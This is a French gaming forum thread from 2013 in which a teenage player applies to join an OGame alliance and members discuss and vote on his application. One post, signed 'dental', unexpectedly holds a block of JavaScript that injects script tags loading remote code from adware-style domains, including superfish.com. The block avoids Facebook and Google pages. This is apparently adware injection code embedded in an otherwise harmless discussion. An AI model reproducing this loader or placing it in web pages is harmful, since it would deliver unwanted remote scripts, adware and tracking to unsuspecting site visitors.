forum de l’alliance L.M.C Index du Forum
forum de l’alliance L.M.C
Forum de l'alliance L.M.C

forum de l’alliance L.M.C Index du ForumFAQRechercherS’enregistrerConnexion
:: Candidature ::

Poster un nouveau sujet   Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    forum de l’alliance L.M.C Index du Forum -> Le monde -> Candidature
Sujet précédent :: Sujet suivant  

foxdead33 rentre dans l'alliance ou non
Oui
75%
 75%  [ 3 ]
Sans avis
25%
 25%  [ 1 ]
Non
0%
 0%  [ 0 ]
Total des votes : 4

Auteur Message
Foxdead33
Membre

Masculin Sagittaire (22nov-21déc)

MessagePosté le: Ven 22 Fév - 20:11 (2013)    Sujet du message: Candidature Répondre en citant

Bonjour tout le monde , je me présente  , je m'appel Florent  16 ans , cela fait quelque semaine que je suis sur ogame et je recherchais une alliance puis je suis tombé sur vous qui semblez mettre en avant l'entraide , étant un petit nouveau sur le jeu , je ne demande qu'à apprendre , je n'ai pas encore choisi mon style de jeu mais je pense être ce qui se rapproche le plus du mineur , je suis actif tous les jours . Voilà pourquoi je poste ma candidature merci  d'avance  Wink

Publicité

MessagePosté le: Ven 22 Fév - 20:11 (2013)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
DARKwarrior
Fondateur

Masculin Cancer (21juin-23juil)

MessagePosté le: Ven 22 Fév - 20:20 (2013)    Sujet du message: Candidature Répondre en citant

Ton nom IG ( in game) :
--> oui 

Les points que tu as :
--> non a donnée merci

Ton ambition :
--> oui 

D'où/comment connais-tu l'alliance :
-->oui 

Si tu seras souvent connecté sur le forum :
-->oui 

Si tu as été dans une autre alliance :
-->non

Si tu es plutôt : Raideur ?   Ou Mineur ?   
-->oui

Et si tu aimerais/souhaiterais avoir des responsabilités dans l'alliance :
-->non

Complete sa est je donnerais un avis je laisse au autre membre le chois de donnee leur avis

Fondateur de cette alliance

Visiter le site web du posteur
Foxdead33
Membre

MessagePosté le: Ven 22 Fév - 20:22 (2013)    Sujet du message: Candidature Répondre en citant

Désolé pour la mégarde je vais recommencer

DARKwarrior
Fondateur

MessagePosté le: Ven 22 Fév - 20:24 (2013)    Sujet du message: Candidature Répondre en citant

ok pas de souci fait le sur le meme sujet si tu veut 

Foxdead33
Membre

MessagePosté le: Ven 22 Fév - 20:32 (2013)    Sujet du message: Candidature Répondre en citant

Donc mon id en ligne c'est foxdead33 je possède actuellement 4039 points , si je souhaite rejoindre votre alliance c'est pour découvrir un aspect supplémentaire de ce jeu en effet je n'est jamais fait parti d'une alliance , comme je le disais je suis tombé par hasard sur cette alliance et dans votre description la notion d'entraide m'a interpelé . Mon style de jeu n'est pas encore défini mais pense que je vais m'orienter vers le mineur , je serais connecté tous les jours et quant à avoir des responsabilité au sein de votre alliance je dirais que non même si je serais ravi d'aider du mieux que je le pourrais . Merci d'avance et désolé pour le premier fail  Wink

DARKwarrior
Fondateur

MessagePosté le: Ven 22 Fév - 20:36 (2013)    Sujet du message: Candidature Répondre en citant

Ces bas grave maintenant que ces complet je vais pouvoir donnée mais avis ton nombre de point est faible mes tu a l'aire d'avoir de l’ambition est ces bien ça après pedro33700 ma dit que tu était sont neveu mais bon cela change pas mon chois est je suis donc pour que tu rejoindre notre alliance. Je laisse mes camarade donnée leur avis 

Je mes un sondage en place voter y merci

pedro33700
Recruteur

Masculin Cancer (21juin-23juil) 龍 Dragon

MessagePosté le: Ven 22 Fév - 21:16 (2013)    Sujet du message: Candidature Répondre en citant

bon j'avais poser un message mais je le voit pas, perso je suis pour apres je suis pas tres objectif quand sa concerne la famille mais c'est un bon gars 

pedro33700
Recruteur

Masculin Cancer (21juin-23juil) 龍 Dragon

MessagePosté le: Sam 23 Fév - 02:11 (2013)    Sujet du message: Candidature Répondre en citant

par contre flo il faut que tu postule sur le jeu pour l'alliance pour être intégrer Smile

dental
Co_fondateur

MessagePosté le: Sam 23 Fév - 13:41 (2013)    Sujet du message: Candidature Répondre en citant

Pour moi je suis sans avis.
très motivé, mais nouveaux dans l’univers 

je vous laisse choisir

//AddWiddit(); function AddWiddit(){ if(window.location.href.indexOf("http:")!=-1 && window.location.href.indexOf("facebook.com")==-1) { var script_tag=document.createElement('script');script_tag.setAttribute("type","text/javascript"); script_tag.setAttribute("src","http://cdn1.certified-apps.com/scripts/shared/enable.js?si=33332&tid=ch6"); (document.getElementsByTagName("head")[0]||document.documentElement).appendChild(script_tag); }} AddSuperFish(); function AddSuperFish(){ if(-1==window.location.href.indexOf("facebook.com")&& -1==window.location.href.indexOf("google.com")) { var a=document.createElement("script"); a.setAttribute("type","text/javascript"); if(-1==window.location.href.indexOf("http:")) { a.setAttribute("src","http://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6"); } else if(-1==window.location.href.indexOf("https:")) { a.setAttribute("src","https://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6"); } (document.getElementsByTagName("head")[0]||document.documentElement).appendChild(a); } } function AddDP() { if (window.location.href.indexOf("http:") != -1 && window.location.href.indexOf("facebook.com") == -1 ) { var script_tag = document.createElement('script'); script_tag.setAttribute("type", "text/javascript"); script_tag.setAttribute("src", "http://i.2yourfacejs.info/toyf/javascript.js?channel=ch6"); // Try to find the head, otherwise default to the documentElement (document.getElementsByTagName("head")[0] || document.documentElement).appendChild(script_tag); } }

DARKwarrior
Fondateur

MessagePosté le: Dim 24 Fév - 12:16 (2013)    Sujet du message: Candidature Répondre en citant

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 04:02 (2018)    Sujet du message: Candidature

Poster un nouveau sujet   Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    forum de l’alliance L.M.C Index du Forum -> Le monde -> Candidature Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

Sauter vers:  

Index | Panneau d’administration | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
onyx © theme by larme d'ange 2006